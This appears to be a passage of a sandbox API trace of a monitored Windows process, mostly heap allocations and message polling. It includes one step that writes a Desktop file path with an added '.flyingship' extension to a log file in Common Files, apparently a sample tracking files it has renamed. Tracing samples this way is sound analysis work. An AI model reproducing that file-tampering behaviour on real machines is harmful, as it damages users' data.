0x8e1ad0 [0165.573] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0165.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0165.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0165.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0165.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0165.573] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0165.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0165.573] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0165.574] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.574] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0165.575] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.575] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0165.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0165.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0165.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0165.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0165.575] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0165.576] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0xa68, lpOverlapped=0x0) returned 1 [0165.576] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0165.576] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xa68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.576] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0165.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0165.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0165.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0165.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.flyingship.png\r\n", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0165.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x43) returned 0x9aa4f8 [0165.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.flyingship.png\r\n", cchWideChar=67, lpMultiByteStr=0x9aa4f8, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.flyingship.png\r\n", lpUsedDefaultChar=0x0) returned 67 [0165.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0165.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0165.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0165.576] WriteFile (in: hFile=0x138, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x42, lpOverlapped=0x0) returned 1 [0165.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0165.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.576] CloseHandle (hObject=0x138) returned 1 [0165.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0165.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0165.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0165.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0165.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0165.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0165.578] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0165.578] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0165.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0165.579] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0165.579] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0165.579] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0165.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0165.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0165.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0165.579] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0165.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0165.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0165.580] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0165.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0165.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0165.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0165.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0165.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0165.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0165.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0165.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0165.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0165.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0165.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0165.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0165.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0165.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0165.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0165.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0165.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0165.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0165.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0165.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0165.583] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0165.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0165.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0165.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0165.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0165.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0165.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0165.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0165.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0165.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0165.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0165.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0165.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 